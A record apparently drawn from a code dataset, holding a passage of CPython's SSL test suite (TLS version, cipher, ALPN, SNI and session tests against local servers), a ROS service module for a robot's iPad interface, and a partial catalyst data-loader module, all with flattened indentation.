t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and master
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
ui.py | #!/usr/bin/env python
import json
import re
import threading
from rosgraph.masterapi import Master
import rospy
from rospy.exceptions import ROSInterruptException
from std_msgs.msg import Empty, String
from needybot.services.base import BaseServiceClient, BaseService
import needybot.lib.channels as nb_channels
from needybot.lib.logger import *
from needybot_srvs.srv import UIMessage
from rosapi.srv import Subscribers
NAMESPACE = '/ui'
SERVICES = [
('send', UIMessage)
]
class UIClient(BaseServiceClient):
def __init__(self):
super(UIClient, self).__init__(NAMESPACE, SERVICES)
class UI(BaseService):
def __init__(self):
super(UI, self).__init__(NAMESPACE)
self.did_timeout = False
self.is_connected = False
self.keep_alive_timer = None
self.register_services(SERVICES)
self.publishers = {}
self.connected_pub = rospy.Publisher(
nb_channels.Messages.ui_connected.value,
Empty,
queue_size=10,
latch=True
)
self.disconnected_pub = rospy.Publisher(
nb_channels.Messages.ui_disconnected.value,
Empty,
queue_size=10,
latch=True
)
self.connection_monitor = threading.Thread(target=self.monitor)
self.connection_monitor.start()
def monitor(self):
# Wait until subscriber on instruct message is present
notified = False
while not rospy.is_shutdown():
_, subscribers, _ = Master('/needybot').getSystemState()
if dict(subscribers).get(nb_channels.Messages.instruct.value) is not None:
if self.is_connected == False:
self.connected_pub.publish()
self.is_connected = True
else:
if self.is_connected or not notified:
notified = True
self.disconnected_pub.publish()
self.is_connected = False
rospy.sleep(0.1)
def send(self, req):
# TODO May want to wait for iPad to connect here
if not self.is_connected:
logwarn('iPad application is not yet connected.')
return False
if req.json:
try:
valid_json = json.loads(req.json)
except:
logerr('Invalid JSON sent to UI service.')
return False
self.send_topic(req.topic, req.json)
return True
def send_topic(self, topic, json_data):
pub = self.publishers.get(topic, None)
if not pub:
pub = rospy.Publisher(
topic,
String,
queue_size=10,
latch=True
)
self.publishers[topic] = pub
rospy.sleep(0.1)
pub.publish(json_data)
if __name__ == '__main__':
try:
rospy.init_node('ui', anonymous=False)
UI()
rospy.spin()
except ROSInterruptException:
rospy.loginfo('UI is shutting down...')
|
loader.py | from typing import Any, Callable, Iterable, Union
from itertools import tee
import queue
import sys
import threading
import numpy as np
import torch
from torch.utils.data import DataLoader
class ILoaderWrapper(DataLoader):
"""Loader wrapper interface.
Args:
loader: torch dataloader.
"""
def __init__(self, loader: DataLoader):
"""Init"""
self.origin = loader
def __getattr__(self, key):
"""
Gets attribute by ``key``.
Firstly, looks at the ``origin`` for the appropriate ``key``.
If none founds - looks at the wrappers attributes.
If could not found anything - returns ``None``.
Args:
key: attribute key
Returns:
attribute value
"""
some_default_value = "_no_attr_found_"
value = self.origin.__dict__.get(key, some_default_value)
# value = getattr(self.origin, key, None)
if value != some_default_value:
return value
value = self.__dict__.get(key, some_default_value)
# value = getattr(self, key, None)
if value != some_default_value:
return value
return None
def __len__(self) -> int:
"""Returns length of the wrapper loader.
Returns:
int: length of the wrapper loader
"""
return len(self.origin)
class BatchLimitLoaderWrapper(ILoaderWrapper):
"""Loader wrapper. Limits number of batches used per each iteration.
For example, if you have some loader and want to use only first 5 bathes:
.. code-block:: python
import torch
from torch.utils.data import DataLoader, TensorDataset
from catalyst.data.loader import BatchLimitLoaderWrapper
num_samples, num_features = int(1e4), int(1e1)
X, y = torch.rand(num_samples, num_features), torch.rand(num_samples)
dataset = TensorDataset(X, y)
loader = DataLoader(dataset, batch_size=32, num_workers=1)
loader = BatchLimitLoaderWrapper(loader, num_batches=5)
or if you would like to use only some portion of Dataloader
(we use 30% in the example below):
.. code-block:: python
import torch
from torch.utils.data import DataLoader, TensorDataset
from catalyst.data.loader import BatchLimitLoaderWrapper
num_samples, num_features = int(1e4), int(1e1)
X, y = torch.rand(num_samples, num_features), torch.rand(num_samples)
dataset = TensorDataset(X, y)
loader = DataLoader(dataset, batch_size=32, num_workers=1)
loader = BatchLimitLoaderWrapper(loader, num_batches=0.3)
.. note::
Generally speaking, this wrapper could be used with any iterator-like
object. No ``DataLoader``-specific code used.
"""
def __init__(self, loader: DataLoader, num_batches: Union[int, float]):
"""Loader wrapper. Limits number of batches used per each iteration.
Args:
loader: torch dataloader.
num_batches (Union[int, float]): number of batches to use (int),
or portion of iterator (float, should be in [0;1] range)
"""
super().__init__(loader)
assert isinstance(num_batches, (int, float)), (
"Expected ``num_batches`` type is int/float" f"but got {type(num_batches)}"
)
if isinstance(num_batches, float):
assert 0.0 <= num_batches <= 1, (
"Expected ``num_batches`` to be in range [0; 1]" f"but got {num_batches}"
)
num_batches = int(len(loader) * num_batches)
self._iterator = iter(self.origin)
self.iteration_index = 0
self.num_batches = num_batches
def __iter__(self):
"""Iterator.
Returns:
iterator object
"""
self.iteration_index = 0
self._iterator, self.iterator = tee(self._iterator)
return self
def __next__(self):
"""Next batch.
Returns:
next batch
Raises:
StopIteration: if iteration_index >= len(origin)
"""
if self.iteration_index >= len(self.origin):
raise StopIteration()
self.iteration_index += 1
if self.iteration_index % self.num_batches == 0:
self._iterator, self.iterator = tee(self._iterator)
batch = next(self.iterator)
return batch
def _any2cuda_non_blocking(value: Any):
# based on catalyst.utils.torch.any2device
# but with cuda non_blocking trick
if isinstance(value, dict):
return {k: _any2cuda_non_blocking(v) for k, v in value.items()}
elif isinstance(value, (tuple, list)):
return [_any2cuda_non_blocking(v) for v in value]
elif torch.is_tensor(value):
return value.cuda(non_blocking=True)
elif isinstance(value, (np.ndarray, np.void)) and value.dtype.fields is not None:
return {k: _any2cuda_non_blocking(value[k]) for k in value.dtype.fields.keys()}
elif isinstance(value, np.ndarray):
return torch.tensor(value).cuda(non_blocking=True)
def _map_loop(
func: Callable,
iterable: Iterable,
result_queue: queue.Queue,
error_queue: queue.Queue,
done_event: threading.Event,
):
try:
for x in iterable:
result = func(x)
result_queue.put(result)
except BaseException:
error_queue.put(sys.exc_info())
finally:
done_event.set()
def _prefetch_map(
func: Callable, iterable: Iterable, num_prefetches: int = 1, timeout: int = 2
) -> Iterable:
result_queue = queue.Queue(num_prefetches)
error_queue = queue.Queue(1)
done_event = threading.Event()
map_thread = threading.Thread(
target=_map_loop, args=(func, iterable, result_queue, error_queue, done_event)
)
map_thread.daemon = True
map_thread.start()
while not (done_event.is_set() and result_queue.empty()):
try:
result = result_queue.get(timeout=timeout)
except queue.Empty:
continue
yield result
if error_queue.full():
raise error_queue.get()[1]
def _prefetch_loader(loader: DataLoader, num_prefetches: int) -> Iterable:
if torch.cuda.is_available():
return _prefetch_map(
_any2cuda_non_blocking, loader, num_prefetches=num_prefetches
)
else:
return iter(loader)
class BatchPrefetchLoaderWrapper(ILoaderWrapper):
"""Loader wrapper. Prefetches specified number of batches on the GPU.
Base usage:
.. code-block:: python
import torch
from torch.utils.data import DataLoader, TensorDataset
from catalyst.data import BatchPrefetchLoaderWrapper
num_samples, num_features = int(1e4), int(1e1)
X, y = torch.rand(num_samples, num_features), torch.rand(num_samples)
